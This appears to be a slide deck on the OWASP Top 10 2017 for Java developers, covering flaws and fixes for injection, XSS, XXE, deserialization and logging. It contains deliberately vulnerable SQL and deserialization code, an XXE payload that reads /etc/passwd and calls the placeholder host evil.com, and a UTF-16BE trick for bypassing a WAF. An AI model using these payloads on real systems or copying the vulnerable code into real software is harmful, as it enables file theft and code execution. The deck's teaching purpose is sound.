About me

• CTO at Diverto
• Open source (security) developer
• Authored own tools/projects
• Contributed to many existing projects
• https://github.com/kost
• Java experience
• programming
• attacking java programs
• building security controls

OWASP TOP 10 2017

• A1-Injection
• A2-Broken Authentication (Session Management)
• A3-Sensitive data exposure
• A4-XML External Entities (XXE)
• A5-Broken Access Control
• A6-Security Misconfiguration
• A7-Cross Site Scripting (XSS)
• A8-Insecure Deserialization
• A9-Using Components with Known Vulnerabilities
• A10-Insufficient Logging and Monitoring

OWASP TOP 10

Already in OWASP TOP 10

• A1-Injection
• A2-Broken Authentication (Session Management)
• A3-Sensitive data exposure
• A5-Broken Access Control
• A6-Security Misconfiguration
• A7-Cross Site Scripting (XSS)
• A9-Using Components with Known Vulnerabilities

"New" vulnerabilities

• A4-XML External Entities (XXE)
• A8-Insecure Deserialization
• A10-Insufficient Logging and Monitoring

Injection

• General problem
• Mixing data and code
• Injecting inputs to existing code
• Different classes
• Database: SQL injection
• XML: XML injection
• LDAP: LDAP injection
• OS: Command injection
• ...

Stored procedures

CREATE PROCEDURE LoginUser 
    @username varchar(32), 
    @password varchar(14) 
AS 
BEGIN 
    DECLARE @sql nvarchar(1024); 
    SET @sql = 'SELECT * FROM UserTable 
                WHERE UserName = ''' + @username + ''' 
                AND Password = ''' + @password + ''' '; 
    EXEC(@sql); 
END 
GO
						    

Stored procedures

    SET @sql = CONCAT (@query, @username);
						    

Injection fixes

• General
• Use prepared queries
• ORM/frameworks usually do this
• Fix stored procedures
• ORM/frameworks DON'T do this
• Reference
• Injection Prevention Cheat Sheet

Cross site scripting

• General problem
• Mixing data and code
• Input mixing with HTML/JS context
• Different classes
• Reflective
• Stored

Cross site scripting

• Impact
• Stealing user session
• Stealing user content
• Capturing keyboard (sniffing)
• Impersonating user

XSS fixes

• General
• Escape output coming from any input
• That includes database you don't control
• You have to tell your framework
• frameworks have f() to help you
• Depending on context
• You will want to check OWASP ESAPI
• Reference
• XSS Prevention Cheat Sheet

XML eXternal Entity (XXE)

• General problem
• Parsing XML files without hardening
• XML eXternal entities or DTD enabled
• Usual inputs
• Web service
• XML RPC
• User upload XML
• XML import
• ...

Google XXE

Facebook XXE

Uber XXE

Simple Example

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE content [

    <!ENTITY ent1 SYSTEM "file:///etc/passwd" >
    <!ENTITY % ent2 PUBLIC "any_text" "http://evil.com/blah" >
    %ent2;
    
    %ent3;
]>
<root>&ent1;&ent2;</root>
						   

XXE Impacts

• Impact
• Reading files
• Reading remote files
• Capturing hashes (sniffing)
• Port scanning
• Remote Code Execution (RCE)
• rare, but possible

WAF/blacklist bypass

echo -n '<?xml version="1.0" encoding="UTF-16BE"' > evil.xml
echo -n '?> <a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> evil.xml
						    

XXE fixes

• General
• Disable External entities
• Usually enabled by default
• Disable DTDs
• Usually enabled by default
• Depending on context
• You will want to check OWASP ESAPI
• Reference
• XXE Prevention Cheat Sheet

Deserialization issues

• General problem
• Deserializing data from untrusted input
• Framework/lib deserializing in background
• Inputs
• Browser
• Socket
• Web Service
• Database
• ...

Simple Example

public String register(@FormParam("object") String serstr) {
byte b[] = Base64.decodeBase64(serstr);
ByteArrayInputStream bi = new ByteArrayInputStream(b);
ObjectInputStream si = new ObjectInputStream(bi);
Object obj = si.readObject();
}
						   

Deserialization Impacts

• Impact
• Changing fields
• which should not be changed
• Remote Code Execution (RCE)
• with permissions of application

Deserialization Fixes

• General
• Do not deserialize untrusted input
• Check your components as well
• Look ahead deserialization
• Better than nothing
• Removing gadgets
• Not real fix, only impact mitigation
• Reference
• Deserialization Cheat Sheet

Logging and monitoring

• General problem
• Application does not log actions
• Applications logs too much
• Actions
• Privileged actions
• Users actions
• User login
• User logout
• ...

Logging/Monitoring Impact

• Impact
• Availability
• Application is working?
• Incident response
• Who have done this?
• Non repudation
• I did not do this

Logging recommendations

• General
• Log all relevant security events
• and monitor!
• Store it remotely and securely
• Attacker can't change it
• Data retention
• especially if sensitive
• Reference
• Logging Cheat Sheet

Simple example

• Display user last login on login
• user will report if suspicious
• provide easy link to report
• display last X logins
• User can check himself

OWASP OpenSAMM

Application Security Verification Standard

OWASP ASVS